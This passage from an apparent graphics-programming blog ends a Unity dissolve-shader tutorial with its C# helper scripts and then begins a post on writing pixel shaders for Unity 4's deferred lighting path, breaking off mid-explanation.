<li>Return a value between 0 and 1 which approaches 0 as the distance to our origin point decreases</li>
</ul>
<p>Let’s start from the obvious place and just add the distance to our previous calculation:</p>
<p>GradientXCoord = ((2.0 * _DissolveValue + NoiseTextureValue) * DistanceToPoint) - 1.0</p>
<p>This is as good a place to start as any, but we’re no longer guaranteed to return 1 when _DissolveValue is 1, and if the distance is > 1, the effect gets way less predictable.</p>
<p>The distance problem is probably what you’ll care about more at first, since it makes the _DissolveValue almost useless unless either your distance to the hit point is exceedingly small, or your _DissolveValue is exceedingly small. What we really want is for our distance value to have a range of 0 to 1 as well, which means we need a value to scale our distance by.</p>
<p>Through experimenting a bit, I’ve found that I get pretty good results with the largest distance between any 2 points on the mesh (in object space) divided by 2. As long as your origin point is on your mesh, just divide the distance from each fragment to the origin point by the max distance we’ve calculated to get a much nicer (although not strictly 0.0 - 1.0 in all cases) value.</p>
<p>You can calculate this scaling value with something like this attached to the object you want to use this shader with:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">Start</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">maxVal</span> <span class="o">=</span> <span class="mf">0.0</span><span class="n">f</span><span class="p">;</span>
<span class="n">Material</span> <span class="n">dissolveMaterial</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Renderer</span><span class="o">></span><span class="p">().</span><span class="n">material</span><span class="p">;</span>
<span class="n">var</span> <span class="n">verts</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">MeshFilter</span><span class="o">></span><span class="p">().</span><span class="n">mesh</span><span class="p">.</span><span class="n">vertices</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">verts</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">var</span> <span class="n">v1</span> <span class="o">=</span> <span class="n">verts</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="n">verts</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="n">j</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">j</span> <span class="o">==</span> <span class="n">i</span><span class="p">)</span> <span class="k">continue</span><span class="p">;</span>
<span class="n">var</span> <span class="n">v2</span> <span class="o">=</span> <span class="n">verts</span><span class="p">[</span><span class="n">j</span><span class="p">];</span>
<span class="kt">float</span> <span class="n">mag</span> <span class="o">=</span> <span class="p">(</span><span class="n">v1</span><span class="o">-</span><span class="n">v2</span><span class="p">).</span><span class="n">magnitude</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">mag</span> <span class="o">></span> <span class="n">maxVal</span> <span class="p">)</span> <span class="n">maxVal</span> <span class="o">=</span> <span class="n">mag</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">dissolveMaterial</span><span class="p">.</span><span class="n">SetFloat</span><span class="p">(</span><span class="s">"_LargestVal"</span><span class="p">,</span> <span class="n">maxVal</span> <span class="o">*</span> <span class="mf">0.5</span><span class="n">f</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Using this value, we can modify our fragment function to look like so:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">mainTex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">noiseVal</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_NoiseTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">).</span><span class="n">r</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">toPoint</span> <span class="o">=</span> <span class="p">(</span><span class="n">length</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">oPos</span><span class="p">.</span><span class="n">xyz</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">hitPos</span><span class="p">.</span><span class="n">xyz</span><span class="p">)</span> <span class="o">/</span> <span class="n">_LargestVal</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">d</span> <span class="o">=</span> <span class="p">(</span> <span class="p">(</span><span class="mf">2.0</span> <span class="o">*</span> <span class="n">_DissolveValue</span> <span class="o">+</span> <span class="n">noiseVal</span><span class="p">)</span> <span class="o">*</span> <span class="n">toPoint</span> <span class="p">)</span> <span class="o">-</span> <span class="mf">1.0</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">overOne</span> <span class="o">=</span> <span class="n">saturate</span><span class="p">(</span><span class="n">d</span> <span class="o">*</span> <span class="n">_GradientAdjust</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">burn</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_BurnGradient</span><span class="p">,</span> <span class="n">float2</span><span class="p">(</span><span class="n">overOne</span><span class="p">,</span> <span class="mf">0.5</span><span class="p">));</span>
<span class="k">return</span> <span class="n">mainTex</span> <span class="o">*</span> <span class="n">burn</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>This actually is pretty close to our end product, but now we have a new problem: by scaling our distance like this, we no longer can guarantee that we have a fully opaque mesh at _DissolveValue 1. What we need to do is make our divisor smaller for higher values of _DissolveValue, which can be done like so:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">mainTex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">noiseVal</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_NoiseTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">).</span><span class="n">r</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">toPoint</span> <span class="o">=</span> <span class="p">(</span><span class="n">length</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">oPos</span><span class="p">.</span><span class="n">xyz</span> <span class="o">-</span> <span class="n">i</span><span class="p">.</span><span class="n">hitPos</span><span class="p">.</span><span class="n">xyz</span><span class="p">)</span> <span class="o">/</span> <span class="p">((</span><span class="mf">1.0001</span> <span class="o">-</span> <span class="n">_DissolveValue</span><span class="p">)</span> <span class="o">*</span> <span class="n">_LargestVal</span><span class="p">));</span>
<span class="n">fixed</span> <span class="n">d</span> <span class="o">=</span> <span class="p">(</span> <span class="p">(</span><span class="n">_DissolveValue</span> <span class="o">+</span> <span class="n">noiseVal</span><span class="p">)</span> <span class="o">*</span> <span class="n">toPoint</span> <span class="p">)</span> <span class="o">-</span> <span class="mf">1.0</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">overOne</span> <span class="o">=</span> <span class="n">saturate</span><span class="p">(</span><span class="n">d</span> <span class="o">*</span> <span class="n">_GradientAdjust</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">burn</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_BurnGradient</span><span class="p">,</span> <span class="n">float2</span><span class="p">(</span> <span class="n">overOne</span><span class="p">,</span> <span class="mf">0.5</span><span class="p">));</span>
<span class="k">return</span> <span class="n">mainTex</span> <span class="o">*</span> <span class="n">burn</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>Make sure that whatever number you subtract _DissolveValue from when you do this is greater than the max value that you can set _DissolveValue to, otherwise you risk dividing by 0 at some point in your effect, which can cause all kinds of problems.</p>
<p>With the above fragment function, you now have a perfectly good shader, but I made one additional artistic modification: I multiplied my final toPoint variable by the noise value before calculating d. This helped me avoid having a perfectly circular hole at high values of the _DissolveValue. It’s not necessary, but I think it looks a lot better.</p>
<p>Using the above script / shader, when I applied this shader to an object, the effect I got looked like this:</p>
<div align="right">
<img src="/images/post_images/2015-10-27/fencedissolve.gif" />
<br />
</div>
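<p>As a rough check of the distance-scaled version of the fragment function, here is the same arithmetic as a CPU-side C++ sketch. The function and parameter names are illustrative only, and the optional noise multiplication on toPoint is left out.</p>

```cpp
#include <algorithm>

// CPU-side stand-in for the shader's saturate(): clamp to [0, 1].
float saturate(float x) { return std::min(1.0f, std::max(0.0f, x)); }

// Gradient lookup coordinate for one fragment, where distToHit is the
// object-space distance from the fragment to the hit point.
float radialGradientCoord(float dissolveValue, float noiseVal,
                          float distToHit, float largestVal,
                          float gradientAdjust)
{
    // 1.0001 instead of 1.0 keeps the divisor above zero at dissolveValue 1.
    float toPoint = distToHit / ((1.0001f - dissolveValue) * largestVal);
    float d = ((dissolveValue + noiseVal) * toPoint) - 1.0f;
    return saturate(d * gradientAdjust);
}
```

<p>At a _DissolveValue of 1 the divisor is tiny, so any fragment with a non-zero distance to the hit point ends up at a coordinate of 1. A fragment sitting exactly on the hit point has a distance of 0 and still maps to 0, which is worth keeping in mind if you see a single dark pixel there.</p>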
<h2>Practical Implementation Details</h2>
<p>Although we have our shader now, we aren’t done. As with a lot of effects, this one is best when it’s driven by some additional CPU-side logic. For one, where are we getting our hit point from? Wouldn’t it be awesome if we could drive that by a mouse click and start burning our paper / fence / whatever at whatever point we wanted?</p>
<p>To do that, let’s expand the script we used to set the max value and give it some additional logic. We also will need to modify our above start function to use the variable _dissolveMaterial instead of the one we used before, which was scoped locally to our start function. I’m going to leave that out here, but the full source is available at the end.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="kt">float</span> <span class="n">_value</span> <span class="o">=</span> <span class="mf">1.0</span><span class="n">f</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">bool</span> <span class="n">_isRunning</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Material</span> <span class="n">_dissolveMaterial</span> <span class="o">=</span> <span class="n">null</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">timeScale</span> <span class="o">=</span> <span class="mf">1.0</span><span class="n">f</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">void</span> <span class="nf">Reset</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">_value</span> <span class="o">=</span> <span class="mf">1.0</span><span class="n">f</span><span class="p">;</span>
<span class="n">_dissolveMaterial</span><span class="p">.</span><span class="n">SetFloat</span><span class="p">(</span><span class="s">"_DissolveValue"</span><span class="p">,</span> <span class="n">_value</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">public</span> <span class="kt">void</span> <span class="nf">TriggerDissolve</span><span class="p">(</span><span class="n">Vector3</span> <span class="n">hitPoint</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">_value</span> <span class="o">=</span> <span class="mf">1.0</span><span class="n">f</span><span class="p">;</span>
<span class="n">_dissolveMaterial</span><span class="p">.</span><span class="n">SetVector</span><span class="p">(</span><span class="s">"_HitPos"</span><span class="p">,</span> <span class="p">(</span><span class="k">new</span> <span class="n">Vector4</span><span class="p">(</span><span class="n">hitPoint</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">hitPoint</span><span class="p">.</span><span class="n">y</span><span class="p">,</span> <span class="n">hitPoint</span><span class="p">.</span><span class="n">z</span><span class="p">,</span> <span class="mf">1.0</span><span class="n">f</span><span class="p">)));</span>
<span class="n">_isRunning</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">Update</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">_isRunning</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">_value</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Max</span><span class="p">(</span><span class="mf">0.0</span><span class="n">f</span><span class="p">,</span> <span class="n">_value</span> <span class="o">-</span> <span class="n">Time</span><span class="p">.</span><span class="n">deltaTime</span><span class="o">*</span><span class="n">timeScale</span><span class="p">);</span>
<span class="n">_dissolveMaterial</span><span class="p">.</span><span class="n">SetFloat</span><span class="p">(</span><span class="s">"_DissolveValue"</span><span class="p">,</span> <span class="n">_value</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>With this, assuming that our shader is going to handle transforming the hit point into object space, all we need now is to cast a ray from the point on the screen where our mouse clicks and pass the hitpoint on our object’s collider to this script.</p>
<p>I’m going to handle this in a different script, so that we can put our dissolve script on multiple objects, but only cast 1 ray for all of them:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">class</span> <span class="nc">TriggerDissolveOnClick</span> <span class="o">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="n">Vector3</span> <span class="n">point</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">didHit</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="n">DissolveEffect</span> <span class="n">targetEffect</span><span class="p">;</span>
<span class="kt">void</span> <span class="n">Update</span> <span class="p">()</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">Input</span><span class="p">.</span><span class="n">GetMouseButton</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RaycastHit</span> <span class="n">hitInfo</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">Physics</span><span class="p">.</span><span class="n">Raycast</span><span class="p">(</span><span class="n">Camera</span><span class="p">.</span><span class="n">main</span><span class="p">.</span><span class="n">ScreenPointToRay</span><span class="p">(</span><span class="n">Input</span><span class="p">.</span><span class="n">mousePosition</span><span class="p">),</span><span class="n">out</span> <span class="n">hitInfo</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">targetEffect</span> <span class="o">=</span> <span class="n">hitInfo</span><span class="p">.</span><span class="n">collider</span><span class="p">.</span><span class="n">gameObject</span><span class="p">.</span><span class="n">GetComponent</span><span class="o"><</span><span class="n">DissolveEffect</span><span class="o">></span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">targetEffect</span> <span class="o">!=</span> <span class="n">null</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">didHit</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="n">point</span> <span class="o">=</span> <span class="n">hitInfo</span><span class="p">.</span><span class="n">point</span><span class="p">;</span>
<span class="n">targetEffect</span><span class="p">.</span><span class="n">Reset</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">didHit</span> <span class="o">&&</span> <span class="n">Input</span><span class="p">.</span><span class="n">GetMouseButtonUp</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">targetEffect</span><span class="p">.</span><span class="n">TriggerDissolve</span><span class="p">(</span><span class="n">point</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>I attached the above script to my main camera (although it isn’t required as long as it’s somewhere in your scene). Once that’s all set up, you can put the DissolveEffect script on any object which uses our dissolve shader, and 1 click will give it the Marvin the Martian treatment:</p>
<div align="right">
<img src="/images/post_images/2015-10-27/multidissolve.gif" />
<br />
</div>
<p>Something to note: if your UVs aren’t set up to handle a seamless texture, you’re going to have a bad time. In cases where the actual texturing of the object requires UVs to be defined with discontinuities (so…pretty much all cases), you’re going to need to find another way to look up your noise texture. Since Unity 5 gives us access to 2 additional UV channels, I recommend trying UV3 or UV4, which will leave your UV2 channel available for lightmapping :)</p>
<p>The source for everything here (scripts and shaders) can be found on google drive <a href="https://drive.google.com/folderview?id=0B85AH3b17yxpdnNSbnNkS3RzbVE&usp=sharing">here</a></p>
<p>If you have any questions about anything, spot a mistake, or just want to say hi, send me a message <a href="http://twitter.com/khalladay">on twitter</a>. Finally I’d like to say thanks to everyone who has emailed me corrections to previous posts, or in some cases code to keep things up to date with new versions of things. I’ll be updating those posts with everything that’s been sent in soon.</p>
<p>Happy shading!</p>
Using Pixel Shaders with Deferred Lighting in Unity 42015-01-03T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2015/01/03/Deferred-Pixel-Shaders<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2015) and may not run / be useful for the latest version of unity
</div>
<p><br /></p>
<p>In a previous post (<a href="http://kylehalladay.com/blog/tutorial/2014/04/05/Writing-Shaders-For-Deferred-Lighting-Unity.html">link</a>), I talked about why surface shaders are a great way to write shaders for Unity’s Deferred Lighting rendering path, and they are.</p>
<p>But given the choice, I’d rather write pixel shaders. Surface shaders always felt a little too much like magic for me, and I’ll trade writing more lines of code for more control over what my gpu is doing any day of the week.</p>
<p>For forward rendering, writing pixel shaders is virtually no different from writing shaders for any other engine. However, not much information is out there about writing pixel shaders that work with Unity’s deferred lighting system (and more maddeningly, there is no information in Unity’s docs), so this post is going to talk about that.</p>
<div align="center">
<img src="/images/post_images/2015-01-03/output_shader.png" />
<font size="2">The shader we'll build in this article</font>
<br />
<br />
</div>
<p>Note that this article will not cover how to write custom lighting models for deferred lighting, but rather how to write shaders which use whatever lighting calculations are generated by the deferred lighting system.</p>
<p>I’m also on a Mac, and the shader compiler for OpenGL is way less picky than the one for DirectX, so if you hit any snags on Windows, send me a message on twitter and we’ll get things sorted out.</p>
<h2>The Deferred Lighting Process</h2>
<p>If you’re unfamiliar with what Deferred Lighting is, I recommend checking out my earlier post (<a href="http://kylehalladay.com/blog/tutorial/2014/04/05/Writing-Shaders-For-Deferred-Lighting-Unity.html">link</a>), where I go over the differences between deferred and forward rendering. As a quick refresher, Unity’s Deferred Lighting system is a 3 step process:</p>
<p><strong>Step 1</strong>: Initial data buffers are constructed. These buffers consist of a depth buffer (Z-Buffer), and a buffer containing the specular power and normals of the objects visible to the camera (G-Buffer).<br /><br />
<strong>Step 2:</strong> the previously built buffers are combined to compute the lighting for each pixel on the screen.<br /><br />
<strong>Step 3</strong>: all of the objects are drawn again. This time, they are shaded with a combination of the computed lighting from step 2 and their surface properties (texture, colour, lighting function, etc).</p>
<p>When you write surface shaders, you don’t really need to worry about the nuts and bolts of this process, but since we’re using pixel shaders we’re directly responsible for the first and last steps. As such all pixel shaders that work with Deferred Lighting are 2 pass shaders (3 pass if you want to cast shadows).</p>
<h2>Our Setup:</h2>
<p>We’ll start building our shader with an empty pixel shader skeleton:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"Specular-Deferred"</span>
<span class="p">{</span>
<span class="n">Properties</span> <span class="p">{</span>
<span class="n">_MainTex</span> <span class="p">(</span><span class="s">"Base (RGB)"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_SpecColor</span> <span class="p">(</span><span class="s">"Specular Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">0.5</span><span class="p">,</span><span class="mf">0.5</span><span class="p">,</span><span class="mf">0.5</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span>
<span class="n">_Shininess</span> <span class="p">(</span><span class="s">"Shininess"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.01</span><span class="p">,</span><span class="mi">1</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.078125</span>
<span class="p">}</span>
<span class="n">SubShader</span><span class="p">{</span>
<span class="n">Pass</span><span class="p">{</span>
<span class="p">}</span>
<span class="n">Pass</span><span class="p">{</span>
<span class="p">}</span>
<span class="n">Pass</span><span class="p">{</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Since we want our object to properly cast shadows, we need to write three passes. Note that if you only need your object to receive shadows, you can omit the third pass, since the shadow attenuation will already be factored into the light buffer that Unity builds during Step 2.</p>
<h2>Pass 1: Getting Data Into the G Buffer</h2>
<p>The first thing we need to do is make sure that the G-Buffer knows about our object’s shape and specularity so that it can properly calculate lighting for the scene. To do this, we need a pass that outputs the normals and specular values for our object.</p>
<p>To start, we need to let Unity know which pass to use to get this information. Just like with forward rendering, we’re going to use the LightMode tag to assign our passes different roles. In this case, we’ll use “PrePassBase.”</p>
<p>A lot of this pass is very straightforward, since for the most part all we’re doing is outputting normals, but since we also want our objects to be shiny, we need to set the alpha of our fragment shader’s output to our object’s shininess, like so:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Pass</span><span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span><span class="s">"LightMode"</span> <span class="o">=</span> <span class="s">"PrePassBase"</span><span class="p">}</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
</span> <span class="cp">#pragma fragment frag
</span> <span class="n">uniform</span> <span class="kt">float</span> <span class="n">_Shininess</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">vIN</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">vertex</span> <span class="o">:</span> <span class="n">POSITION</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normal</span> <span class="o">:</span> <span class="n">NORMAL</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="nc">vOUT</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">pos</span> <span class="o">:</span> <span class="n">SV_POSITION</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">wNorm</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">vOUT</span> <span class="n">vert</span><span class="p">(</span><span class="n">vIN</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vOUT</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">wNorm</span> <span class="o">=</span> <span class="n">mul</span><span class="p">((</span><span class="n">float3x3</span><span class="p">)</span><span class="n">_Object2World</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">normal</span><span class="p">);</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">float4</span> <span class="n">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">float3</span> <span class="n">norm</span> <span class="o">=</span> <span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">wNorm</span> <span class="o">*</span> <span class="mf">0.5</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.5</span><span class="p">;</span>
<span class="k">return</span> <span class="n">float4</span><span class="p">(</span><span class="n">norm</span><span class="p">,</span> <span class="n">_Shininess</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span></code></pre></figure>
<p>If you’re a bit confused as to why this pass is necessary, think of Deferred Lighting as though it’s a shader replacement technique. In order to build the GBuffer, the camera renders all the objects in the scene using the PrePassBase pass, and saves this to a render texture. It then uses this data as part of the process of building the lighting buffer.</p>
<p>The line in the fragment function which halves the normal and then adds 0.5 to it just takes each component of the normal and remaps it from the range -1 to +1 to the range 0 to 1, so that it can be stored in a texture.</p>
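<p>If the remap is easier to follow outside of a shader, here is a minimal sketch of the same arithmetic in plain Python. The function names are made up for illustration, and the decode step is only my assumption about what a reader of the texture would do to get the original normal back; it isn't part of the pass above.</p>

```python
def encode_normal(n):
    """Remap each component from [-1, 1] to [0, 1], as the frag function does."""
    return tuple(c * 0.5 + 0.5 for c in n)


def decode_normal(t):
    """Assumed inverse remap, from [0, 1] back to [-1, 1]."""
    return tuple(c * 2.0 - 1.0 for c in t)


up = (0.0, 1.0, 0.0)
stored = encode_normal(up)
print(stored)                  # (0.5, 1.0, 0.5)
print(decode_normal(stored))   # (0.0, 1.0, 0.0)
```

<p>A normal pointing straight up ends up as a mid-grey red and blue with a full green channel, which is why world space normal buffers tend to look pastel when you view them directly.</p>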
<h2>Pass 2: Getting Data Out of the Light Buffer</h2>
<p>Once that lighting buffer is created, our job changes from putting data into it, to getting data out of it.</p>
<p>Just like forward rendering, our second pass uses a different tag, PrePassFinal, to let Unity know to use this pass for the last step of the deferred rendering process. Otherwise, the first few lines of this pass are unremarkable.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Pass</span><span class="p">{</span>
<span class="n">Tags</span><span class="p">{</span><span class="s">"LightMode"</span> <span class="o">=</span> <span class="s">"PrePassFinal"</span><span class="p">}</span>
<span class="n">ZWrite</span> <span class="n">off</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
</span> <span class="cp">#pragma fragment frag
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">uniform</span> <span class="n">float4</span> <span class="n">_SpecColor</span><span class="p">;</span>
<span class="n">uniform</span> <span class="n">sampler2D</span> <span class="n">_LightBuffer</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">vIN</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">vertex</span> <span class="o">:</span> <span class="n">POSITION</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">texcoord</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="nc">vOUT</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">pos</span> <span class="o">:</span> <span class="n">SV_POSITION</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">uv</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">uvProj</span> <span class="o">:</span> <span class="n">TEXCOORD1</span><span class="p">;</span>
<span class="p">};</span>
<span class="p">}</span></code></pre></figure>
<p>The vert function is where things start getting interesting. The fragment function will sample the light buffer using tex2Dproj, which takes a 4 component vector and divides the xy components by the w component before doing the lookup.</p>
<p>Since what we need to do is sample the light buffer at the exact point on the screen that our fragment will be drawn, we have to set our 4 component uv vector to our fragment’s position in clip space. This will let tex2Dproj perform the perspective divide for us, letting us get at exactly the point on the light buffer that we need.</p>
<p>Or rather, that’s the easy way of looking at it. In truth it’s a bit messier than that. Let’s look at what our vertex function ends up being:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">vOUT</span> <span class="nf">vert</span><span class="p">(</span><span class="n">vIN</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vOUT</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">float4</span> <span class="n">posHalf</span> <span class="o">=</span> <span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">*</span> <span class="mf">0.5</span><span class="p">;</span>
<span class="n">posHalf</span><span class="p">.</span><span class="n">y</span> <span class="o">*=</span> <span class="n">_ProjectionParams</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">uvProj</span><span class="p">.</span><span class="n">xy</span> <span class="o">=</span> <span class="n">posHalf</span><span class="p">.</span><span class="n">xy</span> <span class="o">+</span> <span class="n">float2</span><span class="p">(</span><span class="n">posHalf</span><span class="p">.</span><span class="n">w</span><span class="p">,</span> <span class="n">posHalf</span><span class="p">.</span><span class="n">w</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uvProj</span><span class="p">.</span><span class="n">zw</span> <span class="o">=</span> <span class="n">o</span><span class="p">.</span><span class="n">pos</span><span class="p">.</span><span class="n">zw</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">texcoord</span><span class="p">;</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>To start with, we’re halving the clip space coordinates for our projected uvs. I’m assuming this is because the light buffer isn’t actually a screen size texture, but since there’s no information available about how Unity’s implementation works under the hood, it’s hard to know for sure.</p>
<p>You could try setting up a deferred lighting scene on an iOS device and using Xcode’s GPU frame capture to get at that data, but I don’t have any iOS devices in my apartment so I’ll leave that to you (send me a message <a href="http://twitter.com/khalladay">on twitter</a> if you actually try this :D ).</p>
<p>The <a href="http://docs.unity3d.com/Manual/SL-BuiltinValues.html">Unity docs</a> have this to say about _ProjectionParams:</p>
<blockquote>
